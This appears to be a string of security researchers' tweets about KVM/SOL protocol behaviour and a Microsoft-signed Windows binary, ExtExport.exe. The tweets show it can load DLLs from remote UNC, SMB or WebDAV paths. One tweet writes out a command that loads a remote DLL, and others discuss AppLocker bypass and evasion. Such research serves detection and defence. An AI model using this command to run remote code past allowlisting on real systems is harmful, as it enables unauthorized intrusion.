@_markel___ That clears it up for me, thanks! I haven't pulled apart the firmware yet, so my perspective comes from observing the protocols. I believe you are correct, and I hope you can see where the initial description was coming from!
@_markel___ From a protocol perspective I'm interacting with a kvmr session not SOL. Factoring in your comments gives me the impression that kvmr uses SOL internally for keyboard manipulation. Would you agree with that assessment?
MS signed #lolbin ExtExport accepts UNC paths. Loads DLL from local disk, SMB and WebDav links. 64 and 32 bit bins on disk.
.\ExtExport.exe "\\https://t.co/6g1Z1r0yHM\tools\Autoruns64.dll" a b JSON FIREFOX c
Anyone care to test if it has evasive properties?
@Oddvarmoe Thanks for checking, I really appreciate it. Also, that is interesting behavior.
Considering that LoadLibrary and friends are stopped - I suspect that AppLocker bypasses will require an interpreter, or other means of executing data as code.
@subTee Found a MS signed program in standard win10 install - it lets you load arbitrary dlls into memory. Not sure if its interesting, mind taking a look? (DM me)